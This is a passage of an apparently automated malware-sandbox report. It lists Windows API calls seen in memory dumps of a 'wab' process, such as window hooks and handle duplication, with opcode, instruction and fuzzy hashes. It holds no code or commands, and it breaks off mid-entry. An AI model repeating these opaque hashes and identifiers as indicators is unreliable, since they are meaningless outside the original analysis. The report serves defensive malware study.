                                                                          • Instruction Fuzzy Hash: 493120B0D00388DFDB10DF99D984B8EBBF6AF48304F248459E509BB390CBB06A45CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 233C739F
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233c0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: f795b609196fc74c9c0c89629adff78c5f3f805b57356eabf7daeec29e876096
                                                                          • Instruction ID: 0b8dd906733fb918f784ebd07cc9f0254b6a67dc2acc6e6842d007652dd51d08
                                                                          • Opcode Fuzzy Hash: f795b609196fc74c9c0c89629adff78c5f3f805b57356eabf7daeec29e876096
                                                                          • Instruction Fuzzy Hash: BC2114B59002499FDB10CFA9D984AEEBFF5EB48320F14845AE959A3350C374A940CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 233C739F
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233c0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: a64fd9c6d61d3fcc967f88960e9e9c804e7beb3d62e65bfef824054141514040
                                                                          • Instruction ID: 60f13ebe3a62af50ac8d935642c18cb2b05028edad800ad67c0a76252bbbf73a
                                                                          • Opcode Fuzzy Hash: a64fd9c6d61d3fcc967f88960e9e9c804e7beb3d62e65bfef824054141514040
                                                                          • Instruction Fuzzy Hash: 8721E2B59002489FDB10CFAAD984ADEBBF4EB48320F14841AE959A7350D374AA54CFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 233CA963
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233c0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: HookWindows
                                                                          • String ID:
                                                                          • API String ID: 2559412058-0
                                                                          • Opcode ID: 6eac6457be5849f94f7dbd59df876af8404336cbe746e681ec5ebc7d414779bd
                                                                          • Instruction ID: cee265418d54e490c0433a7caf00476fe5f46245d75a2e2210fd67b1751ad2fa
                                                                          • Opcode Fuzzy Hash: 6eac6457be5849f94f7dbd59df876af8404336cbe746e681ec5ebc7d414779bd
                                                                          • Instruction Fuzzy Hash: A32135B59002098FCB14DFA9C845BEEFBF1FF88310F148429D459A7250C774AA44CFA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 233CA963
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233c0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: HookWindows
                                                                          • String ID:
                                                                          • API String ID: 2559412058-0
                                                                          • Opcode ID: 562d477d0dcf8ce887ecb29d1160a19fcca1d4a5f6721fd154a3add952239adc
                                                                          • Instruction ID: 7d21baa0258156115c94a3e5133f24344f5c00aa3b8d0e0df9966fea3e3dae7f
                                                                          • Opcode Fuzzy Hash: 562d477d0dcf8ce887ecb29d1160a19fcca1d4a5f6721fd154a3add952239adc
                                                                          • Instruction Fuzzy Hash: D82127B59002499FCB14DF9AC945BDEFBF5EF88310F108419D459A7250C774A944CFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,233C84BD), ref: 233C8547
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233c0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: d926c9aaa54b932c30d526b4773cdd4bca16f2aded50a991ca27fc34aefbdb22
                                                                          • Instruction ID: ddd2a4906cbd0f286e9649c499e696ddb9df512d218a8d843c8323b14229548f
                                                                          • Opcode Fuzzy Hash: d926c9aaa54b932c30d526b4773cdd4bca16f2aded50a991ca27fc34aefbdb22
                                                                          • Instruction Fuzzy Hash: 43116AB18043998FCB10DF9AD444BDEBFF4EF89320F14849AD559AB351C374AA44CBA6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 233C2276
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233c0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 0487d3cadac147195eca5aa6c500c8157f9bc645843a2088b928ace9346afe99
                                                                          • Instruction ID: 6f3126bb0a7862b3bfab8a99189ff63ea809a50c1fee55cf123134c8faccfac7
                                                                          • Opcode Fuzzy Hash: 0487d3cadac147195eca5aa6c500c8157f9bc645843a2088b928ace9346afe99
                                                                          • Instruction Fuzzy Hash: A011F3B6C006498ECB10DF9AC444BDEFBF1EF88310F14855AD869A7611C374A945CFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 233C2276
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233c0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: ed05dd079e16d09c9a663dec3f72b439c7bee303bf44d182f4e8e9042547cc5d
                                                                          • Instruction ID: e9ee95174053665fc5120e23bbf3f76f506b1d87fec9d636e81ae9ba92aa2699
                                                                          • Opcode Fuzzy Hash: ed05dd079e16d09c9a663dec3f72b439c7bee303bf44d182f4e8e9042547cc5d
                                                                          • Instruction Fuzzy Hash: F511F0B68007498FCB10DF9AC844A9EFBF4EB89710F10856AD929A7210C375AA45CFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • OleInitialize.OLE32(00000000), ref: 233C8E05
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233c0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize
                                                                          • String ID:
                                                                          • API String ID: 2538663250-0
                                                                          • Opcode ID: ceb1c8792f77aba8d2e30a3b29e5bfc8517d8c7c5b4cf1d526616431a98892e0
                                                                          • Instruction ID: c28fd1dcdb96ff848841f7f79fa11a9a45d43d5f172c07236fea4b6bccf6c6cd
                                                                          • Opcode Fuzzy Hash: ceb1c8792f77aba8d2e30a3b29e5bfc8517d8c7c5b4cf1d526616431a98892e0
                                                                          • Instruction Fuzzy Hash: 751115B59003498FCB20DFAAD548BDEFBF4EB48320F108859D559A7211C375AA44CFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • OleInitialize.OLE32(00000000), ref: 233C8E05
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233c0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize
                                                                          • String ID:
                                                                          • API String ID: 2538663250-0
                                                                          • Opcode ID: 308534e9aeffdf61decdb7afeefa339da38f8befde95b61567e3388380efdf7f
                                                                          • Instruction ID: 1ee085a03f14ca2850a51406997b4140ac194c1b22bf0a6260d5a02a2c21ff34
                                                                          • Opcode Fuzzy Hash: 308534e9aeffdf61decdb7afeefa339da38f8befde95b61567e3388380efdf7f
                                                                          • Instruction Fuzzy Hash: EB1118B58003498FCB20DF9AC545BDEFBF4EB48310F148459D559A7311C375AA44CFA6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,233C84BD), ref: 233C8547
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233c0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 8d9fc71f4ea457ef20f601b07e1a25f873036b2ca3e61eddc5a9e91d3295e6d7
                                                                          • Instruction ID: 1537a78663bf451173aad16b77caaf8ba17cb7e1c02c3406b47993d9a0efbd3b
                                                                          • Opcode Fuzzy Hash: 8d9fc71f4ea457ef20f601b07e1a25f873036b2ca3e61eddc5a9e91d3295e6d7
                                                                          • Instruction Fuzzy Hash: AD1133B18003498FCB20DF9AC484BDEFBF4EB48320F20845AE519A7240C774AA44CFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • OleInitialize.OLE32(00000000), ref: 233C8E05
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233c0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize
                                                                          • String ID:
                                                                          • API String ID: 2538663250-0
                                                                          • Opcode ID: cef440e0c3acd05d1f34748092005be693f1adace782b45e266c6fbeb92adfb3
                                                                          • Instruction ID: 32f8c286ae2991e4dbc338514c60cf8187a107777948be4f6f822db1fc3e095e
                                                                          • Opcode Fuzzy Hash: cef440e0c3acd05d1f34748092005be693f1adace782b45e266c6fbeb92adfb3
                                                                          • Instruction Fuzzy Hash: C01145B18002498FCB20DFAAC585BDEFFF0EF88320F248959D559A7211C374AA44CFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,233C84BD), ref: 233C8547
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233c0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 50bdef9d576ea7f0b138e7e2f04d0a074ff439336127d2f24822b85fe155081c
                                                                          • Instruction ID: 812d2ea9f0b5bb924f79c7616ed32a2f3f2fff6729957c88d1aea032866d3068
                                                                          • Opcode Fuzzy Hash: 50bdef9d576ea7f0b138e7e2f04d0a074ff439336127d2f24822b85fe155081c
                                                                          • Instruction Fuzzy Hash: 5A1103B5800249CFCB20DF9AD985BDEBBF4EB88320F20845AD559A7251C774AA44CFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LRqq
                                                                          • API String ID: 0-2392378202
                                                                          • Opcode ID: 15ce10e8291380a8a334b21602950900b385291c1736f55e0bbd7d56db7568c1
                                                                          • Instruction ID: 6f2944ac1730b08a9279c35709a8dc5e44d7a1ce610f066aa7992dc38de578b6
                                                                          • Opcode Fuzzy Hash: 15ce10e8291380a8a334b21602950900b385291c1736f55e0bbd7d56db7568c1
                                                                          • Instruction Fuzzy Hash: C6516D34714215CFCB04DB68D958AAE7BF2EF89315F2084A9E40AEB3A1DB75DC41CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: PHqq
                                                                          • API String ID: 0-2246444507
                                                                          • Opcode ID: 48e0fb75bc9b3d27d65f7c184ea428a7ef91da5d28704a18ec57211ca89e20d4
                                                                          • Instruction ID: 7c2008466424db8f30ec7cf51a6a22ef84d6d155b7b9ad56f3c1ee28a3ae0d30
                                                                          • Opcode Fuzzy Hash: 48e0fb75bc9b3d27d65f7c184ea428a7ef91da5d28704a18ec57211ca89e20d4
                                                                          • Instruction Fuzzy Hash: 5E41B672A00309DFDB15DF64C880B9EBBB6FF86300F24456AE405DB245DB74AA46CB51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: PHqq
                                                                          • API String ID: 0-2246444507
                                                                          • Opcode ID: 239fa1cbd1149a6d431c56387633b9ee771effc09eec488eeffbc44c706ab345
                                                                          • Instruction ID: 36b0786a0d554c27d549cf4b80c9178b2530196fca088c1eb24d4924d7470c38
                                                                          • Opcode Fuzzy Hash: 239fa1cbd1149a6d431c56387633b9ee771effc09eec488eeffbc44c706ab345
                                                                          • Instruction Fuzzy Hash: 00318F72B002098FDB49AB74C95466F7BA7BB89301F2444A8E406DB395EF35DE468790
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LRqq
                                                                          • API String ID: 0-2392378202
                                                                          • Opcode ID: 291c8b6cc02c53962bc30c1d9e55f80fe14b6f1ba6515f3f830f948ac7dd34e0
                                                                          • Instruction ID: b17231bbefb6691112db844ff93b763a5cec3f83226cf6d662f19e7a27a290a6
                                                                          • Opcode Fuzzy Hash: 291c8b6cc02c53962bc30c1d9e55f80fe14b6f1ba6515f3f830f948ac7dd34e0
                                                                          • Instruction Fuzzy Hash: 63317075E41209DBDB19CFA8C84879EB7B1FF85300F20C965E809E7250DB78AD45CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LRqq
                                                                          • API String ID: 0-2392378202
                                                                          • Opcode ID: 62c7d3757cd5c8fa2a12959db8a86de1e3b81a8e42d7ee270c8cbc8a640d4bf2
                                                                          • Instruction ID: 07781549c1e6f3caf3ad2ad51263d56ee2c28863da683c2e226fc0962fda7bea
                                                                          • Opcode Fuzzy Hash: 62c7d3757cd5c8fa2a12959db8a86de1e3b81a8e42d7ee270c8cbc8a640d4bf2
                                                                          • Instruction Fuzzy Hash: 5D318E71E412099BDB19CF68C8587DEB7B2FF89300F20C929E805EB250EB78AD41CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ('z"
                                                                          • API String ID: 0-2037438512
                                                                          • Opcode ID: 74dd574732f993daaa4afc07e97d8044e42d31c12ea43899bd88f03aa258ea27
                                                                          • Instruction ID: 881cb30d9cbf3f341084e100e832028a24def914171fccabc83ae4f6094f00ed
                                                                          • Opcode Fuzzy Hash: 74dd574732f993daaa4afc07e97d8044e42d31c12ea43899bd88f03aa258ea27
                                                                          • Instruction Fuzzy Hash: 94219F31B001048FDF24DB68E9912ADB7B2EB89325F24C476E81DDB356EA35DE458750
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ~]"
                                                                          • API String ID: 0-2940544721
                                                                          • Opcode ID: 86380a6f7322557555636850cefb3f1c8af1a6cfc034d316cf2ce670f90571da
                                                                          • Instruction ID: 0d6f0205b4b8667839f3dc1bb138e9111e5ef3b482090b6a22384c91c800da0d
                                                                          • Opcode Fuzzy Hash: 86380a6f7322557555636850cefb3f1c8af1a6cfc034d316cf2ce670f90571da
                                                                          • Instruction Fuzzy Hash: 5821A4B0A402109BDB755B3CD8983AD3BE5D756322F51C86AE80FCB295DA2DCC81C792
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: \Ovq
                                                                          • API String ID: 0-2235447841
                                                                          • Opcode ID: 13232732d8d4dd9cd63bfd8b378bc7bad5de3c379d73e5e8456ee4228ea59140
                                                                          • Instruction ID: 5888e8cd323aec76553dc308726bce2500048a06b71f9684e9c188dc62577b3c
                                                                          • Opcode Fuzzy Hash: 13232732d8d4dd9cd63bfd8b378bc7bad5de3c379d73e5e8456ee4228ea59140
                                                                          • Instruction Fuzzy Hash: 9FF0FE71A14119DFDF18DF90E959BAEBBB6FF44711F204119F402A7294CB741D02CB80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2321f286384543922a8dfbb5af204afa978f7fedb790d4cde02e98dd1e7919d4
                                                                          • Instruction ID: f17528a9ef203d1810cc09c16e2dfb69ab49b0efd983b6ff2d0b8a6b891944ff
                                                                          • Opcode Fuzzy Hash: 2321f286384543922a8dfbb5af204afa978f7fedb790d4cde02e98dd1e7919d4
                                                                          • Instruction Fuzzy Hash: 68329076B102098FDB04DF68C990A9DB7B6FF88310F2485A5E419EB356DB35EE41CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ceb7428cc1a27dce2f1511cef17e04cff4d9dc956f41cfae76bcc952e8fd4a6c
                                                                          • Instruction ID: 1573c569884337958963b9ba7480ba0ed36fa3f1e6febaed19769a6affb2eae3
                                                                          • Opcode Fuzzy Hash: ceb7428cc1a27dce2f1511cef17e04cff4d9dc956f41cfae76bcc952e8fd4a6c
                                                                          • Instruction Fuzzy Hash: 92D178B1A002059FDB14CF68D9807AEBBB2FF89310F20C569E819DB295EB75DC45CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: adeb88491bcab164e88c3fabbd8958f3a34d3955472c509f1b2fe6a08ecd0f2c
                                                                          • Instruction ID: 56dd795eb72e6f3562994372161d958a0dd9d72851803047ef5e0a9d7993ccb3
                                                                          • Opcode Fuzzy Hash: adeb88491bcab164e88c3fabbd8958f3a34d3955472c509f1b2fe6a08ecd0f2c
                                                                          • Instruction Fuzzy Hash: 75A18472B101098FDF04DFACC990B9EB7B6FB49310F248865E509E7356DA38DE818B91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1f30aab456f4a6a6e6bae44c7b79f37d636a864267c7eb2e185a46c1a83a936e
                                                                          • Instruction ID: 4c14ebbf5b2732c3b7a211feaedb192ef12dd1e9659bec69afb3338362c9ad12
                                                                          • Opcode Fuzzy Hash: 1f30aab456f4a6a6e6bae44c7b79f37d636a864267c7eb2e185a46c1a83a936e
                                                                          • Instruction Fuzzy Hash: EEB14A70E00209CFDB20CFA9DD857DEBBF2AF88354F24C529D459AB294EB749845CB81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9338ec11c290d42d787bc952664d5a8c8aa2bf8db26492197803116510361614
                                                                          • Instruction ID: ff7a8d49e2b95d9150929837e4085c826b30be289bbba472120516080216476c
                                                                          • Opcode Fuzzy Hash: 9338ec11c290d42d787bc952664d5a8c8aa2bf8db26492197803116510361614
                                                                          • Instruction Fuzzy Hash: 4FA16B71E00209DFDF10DFA9C9857DEBBF2AF88354F14C129E459AB294DB349985CB81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 597627363cc8d6a7fffd9eb555f2bdccf10984c0879be10566db74be28149aba
                                                                          • Instruction ID: e56e8ccc46b730efb5cede13306791a174f3b9529c0cd0750706eb7206d09a1a
                                                                          • Opcode Fuzzy Hash: 597627363cc8d6a7fffd9eb555f2bdccf10984c0879be10566db74be28149aba
                                                                          • Instruction Fuzzy Hash: CF61D473F001214BDB04AA7ECC5069EBADBAFC4610B154479E80AEB375DE65DE028BD5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 940184fa4ff2139c225d06db4a41d4423b717aa30b7ce4334afeaed4f0ded884
                                                                          • Instruction ID: 3db508ac7cc63c4c1fbad554e756acb56d2c0313ce626a51b67548febb1ea827
                                                                          • Opcode Fuzzy Hash: 940184fa4ff2139c225d06db4a41d4423b717aa30b7ce4334afeaed4f0ded884
                                                                          • Instruction Fuzzy Hash: BC815D72B0020A8BDF08DFA9C95079EB7B7AB88310F158569E40ADB355EE34DD468B81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cec2a9d96fd8eb801366a9bc4df4c834496d1354e6e7ff815858b1662b7f1002
                                                                          • Instruction ID: 6c8e2e39962649b4561e15b301def2fee2b6abd63faadfaff358db9feeb996ac
                                                                          • Opcode Fuzzy Hash: cec2a9d96fd8eb801366a9bc4df4c834496d1354e6e7ff815858b1662b7f1002
                                                                          • Instruction Fuzzy Hash: B7913D71E002198BDF14DF68C890B9DB7B1FF89310F208699E549BB255EB70AA85CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c9c823de6df40386c9c48adfbacabd6709e89172238cbafaef7607275058ebab
                                                                          • Instruction ID: bee83ee355fd0aedef817eafc7a6681f76817ca214246bb49423864a2280edb6
                                                                          • Opcode Fuzzy Hash: c9c823de6df40386c9c48adfbacabd6709e89172238cbafaef7607275058ebab
                                                                          • Instruction Fuzzy Hash: 3D912E71E006198BDF14DF68C890B9DB7B1FF89310F208599E549BB355EB70AA85CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 14ec665532e9890b530d82c2f2190b7315cf3680a9348f44fccf3ad9f4533e61
                                                                          • Instruction ID: bf9b72bdde3408e0d590c528d87aaadefa496f9e06e337b4b09b41ccc4c342d0
                                                                          • Opcode Fuzzy Hash: 14ec665532e9890b530d82c2f2190b7315cf3680a9348f44fccf3ad9f4533e61
                                                                          • Instruction Fuzzy Hash: F751A072B103289BEB106E6CCC8475F269EEB8D352F244469E50EC7396CE7CCE519392
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
